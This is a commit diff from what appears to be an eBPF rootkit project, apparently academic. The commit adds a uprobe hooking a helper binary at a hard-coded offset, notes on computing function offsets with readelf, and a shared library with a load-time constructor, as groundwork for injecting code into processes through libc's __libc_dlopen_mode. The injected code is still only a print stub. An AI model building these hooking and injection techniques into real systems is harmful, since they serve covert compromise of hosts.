Successfully added uprobes calculation and hooking at arbitrary function of execve_hijack.

.vscode/settings.json

@@ -22,6 +22,7 @@
         "stddef.h": "c",
         "ring_buffer.h": "c",
         "bpf_helpers.h": "c",
-        "tcp_helper.h": "c"
+        "tcp_helper.h": "c",
+        "stdio.h": "c"
     }
 }

docs/commands/uprobe_analysis

@@ -0,0 +1,4 @@
+readelf -s <>
+readelf -S <>
+
+fn symbol offset = fn symbol VA - .text VA + .text offset

external/libbpf-bootstrap/examples/c/uprobe.c

@@ -45,7 +45,8 @@ static long get_base_addr() {
 
 	while (fscanf(f, "%zx-%*x %s %zx %*[^\n]\n", &start, buf, &offset) == 3) {
 		if (strcmp(buf, "r-xp") == 0) {
-			fclose(f);
+			fclose(f); // 401380 //text offset-> 1290 //text VA->401290
+						//4199296 //4752 //4199056
 			return start - offset;
 		}
 	}

src/ebpf/include/bpf/injection.h

@@ -0,0 +1,19 @@
+#ifndef __BPF_INJECTION_H
+#define __BPF_INJECTION_H
+
+
+#include "headervmlinux.h"
+
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_tracing.h>
+#include <bpf/bpf_core_read.h>
+
+#include "../../../common/constants.h"
+
+SEC("uprobe/execute_command")
+int uprobe_execute_command(struct pt_regs *ctx){
+    bpf_printk("UPROBE activated\n");
+    return 0;
+}
+
+#endif

src/ebpf/kit.bpf.c

@@ -37,6 +37,7 @@
 #include "include/bpf/sched.h"
 #include "include/bpf/fs.h"
 #include "include/bpf/exec.h"
+#include "include/bpf/injection.h"
 
 char LICENSE[] SEC("license") = "Dual BSD/GPL";
 #define ETH_ALEN 6

src/helpers/Makefile

@@ -3,13 +3,10 @@ HEADERS = lib/RawTCP.h
 EXTRA_CFLAGS= -I$(PWD)/lib
 
 default:
-	make execve_hijack injection_ex
+	make execve_hijack injection_lib
 
-injection_ex.o: injection_ex.c
-	clang -g -Wall -c injection_ex.c
-
-injection_ex: injection_ex.o
-	clang -g -Wall -o injection_ex injection_ex.o -ldl
+injection_lib: injection_lib.o
+	gcc -Wall -shared -fPIC -o injection_lib.so injection_lib.c -ldl
 
 execve_hijack.o: execve_hijack.c $(HEADERS)
 	clang -c execve_hijack.c
@@ -20,5 +17,5 @@ execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
 clean:
 	-rm -f execve_hijack.o
 	-rm -f execve_hijack
-	-rm -f injection_ex.o
-	-rm -f injection_ex
+	-rm -f injection_lib.o
+	-rm -f injection_lib.so

src/helpers/execve_hijack.c

@@ -71,7 +71,7 @@ int main(int argc, char* argv[], char *envp[]){
     for(int ii=0; ii<argc; ii++){
         printf("Argument %i is %s\n", ii, argv[ii]);
     }
-
+    
     time_t rawtime;
     struct tm * timeinfo;
 

src/helpers/injection_ex.c

@@ -1,23 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <dlfcn.h>
-#include <link.h>
-
-int main(){
-    struct link_map *lm;
-	off_t offset = 0;
-	unsigned long long dlopenAddr;
-    lm = dlopen("libc.so.6", RTLD_LAZY);
-	if(lm==0){
-		perror("Error obtaining libc symbols");
-		return -1;
-	}
-    dlopenAddr = (unsigned long long)dlsym((void*)lm, "__libc_dlopen_mode");
-    printf("libdl: %lx\n", lm->l_addr);
-	printf("dlopen: %llx\n", dlopenAddr);
-	offset = dlopenAddr - lm->l_addr;
-	printf("Offset: %lx\n", offset);
-
-    return 0;
-}

src/helpers/injection_lib.c

@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+__attribute__((constructor))
+static void init()
+{
+    puts("It worked\n");
+}

src/user/include/modules/injection.h

@@ -0,0 +1,35 @@
+#ifndef __MOD_INJECTION_H
+#define __MOD_INJECTION_H
+
+#include <linux/bpf.h>
+#include <bpf/bpf.h>
+#include <bpf/libbpf.h>
+#include "kit.skel.h"
+#include "common.h"
+
+//Connections
+int attach_uprobe_execute_command(struct kit_bpf *skel){
+    skel->links.uprobe_execute_command = bpf_program__attach_uprobe(skel->progs.uprobe_execute_command, false, -1, "/home/osboxes/TFG/src/helpers/execve_hijack", 4992);
+	printf("SET\n");
+    return libbpf_get_error(skel->links.tp_sys_enter_execve);
+}
+
+int attach_injection_all(struct kit_bpf *skel){
+    return attach_uprobe_execute_command(skel);
+}
+
+
+int detach_uprobe_execute_command(struct kit_bpf *skel){
+    int err = detach_link_generic(skel->links.uprobe_execute_command);
+    if(err<0){
+        fprintf(stderr, "Failed to detach fs link\n");
+        return -1;
+    }
+    return 0;
+}
+
+int detach_injection_all(struct kit_bpf *skel){
+    return detach_uprobe_execute_command(skel);
+}
+
+#endif

src/user/include/modules/module_manager.c

@@ -3,6 +3,7 @@
 #include "sched.h"
 #include "fs.h"
 #include "exec.h"
+#include "injection.h"
 
 module_config_t module_config = {
     .xdp_module = {
@@ -22,6 +23,10 @@ module_config_t module_config = {
     .exec_module = {
         .all = ON,
         .tp_sys_enter_execve = OFF
+    },
+    .injection_module = {
+        .all = ON,
+        .uprobe_execute_command = OFF
     }
 
 };
@@ -34,7 +39,8 @@ module_config_attr_t module_config_attr = {
     },
     .sched_module = {},
     .fs_module = {},
-    .exec_module = {}
+    .exec_module = {},
+    .injection_module = {}
 };
 
 
@@ -78,6 +84,13 @@ int setup_all_modules(){
     }
     if(ret!=0) return -1;
 
+    //INJECTION
+    if(config.injection_module.all == ON){
+        ret = attach_injection_all(attr.skel);
+    }else{
+        if(config.injection_module.uprobe_execute_command == ON) ret = attach_uprobe_execute_command(attr.skel);
+    }
+    if(ret!=0) return -1;
 
     return 0;
 }

src/user/include/modules/module_manager.h

@@ -35,6 +35,11 @@ typedef struct module_config_t{
         char tp_sys_enter_execve;
     }exec_module;
 
+    struct injection_module {
+        char all;
+        char uprobe_execute_command;
+    }injection_module;
+
 } module_config_t;
 
 //Configuration struct. Used by the module manager to
@@ -58,6 +63,10 @@ typedef struct module_config_attr_t{
         void* __empty;
     }exec_module;
 
+    struct injection_module_attr {
+        void* __empty;
+    }injection_module;
+
 } module_config_attr_t;
 
 //An unique module configutation struct and attr

src/user/kit.c

@@ -225,6 +225,9 @@ int main(int argc, char**argv){
 	offset = dlopenAddr - lm->l_addr;
 	printf("Offset: %lx\n", offset);
 
+	//Once we have the offset of libc we proceed to uprobe our target program
+
+
 	//Now wait for messages from ebpf program
 	printf("Filter set and ready\n");
 	while (!exiting) {